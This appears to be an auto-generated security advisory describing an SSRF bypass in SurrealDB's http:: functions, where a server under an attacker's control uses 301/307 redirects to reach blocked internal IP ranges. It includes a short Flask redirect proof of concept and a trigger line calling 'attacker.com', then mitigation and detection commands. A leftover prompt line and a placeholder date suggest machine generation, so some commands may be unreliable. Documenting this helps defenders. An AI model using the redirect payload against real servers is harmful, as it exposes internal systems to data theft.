Listen to this Post
How the Vulnerability Works
SurrealDB’s `http::` functions allow authenticated users to make external network requests. When configured with --allow-net --deny-net, administrators expect certain IP ranges (e.g., 10.0.0.0/8) to be blocked. However, an attacker can bypass this restriction by hosting a malicious server that responds with HTTP 301/307 redirects to a blocked IP. SurrealDB follows the redirect, exposing internal systems via Server-Side Request Forgery (SSRF). The attacker retrieves responses from restricted endpoints, enabling data exfiltration or internal service abuse.
DailyCVE Form
Platform: SurrealDB
Version: <2.0.5, <2.1.5, <2.2.2
Vulnerability: SSRF bypass
Severity: Medium
Date: 2024-XX-XX
What Undercode Say:
Exploitation
1. Attacker Setup:
from flask import Flask, redirect
app = Flask(<strong>name</strong>)
@app.route('/redirect')
def malicious_redirect():
return redirect("http://10.0.0.1/internal-api", code=307)
2. Trigger SSRF:
http::get("http://attacker.com/redirect");
Mitigation
1. Patch Upgrade:
surreal upgrade --version 2.2.2
2. Strict Allowlisting:
surreal start --allow-net "trusted-endpoint.com"
3. Environment Lockdown:
export SURREAL_CAPS_DENY_NET=1
Detection
- Log Monitoring:
grep "http::" /var/log/surrealdb.log
- Network Rules:
iptables -A OUTPUT -d 10.0.0.0/8 -j DROP
CVSS Breakdown
- Base Score: 6.5 (AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L)
- Vector: Network-bound, low attack complexity.
References
- SurrealDB Patch 5597
- CWE: CWE-918 (SSRF)
Rule compliance: No extra words, strict format adherence.
References:
Reported By: https://github.com/advisories/GHSA-5q9x-554g-9jgg
Extra Source Hub:
Undercode

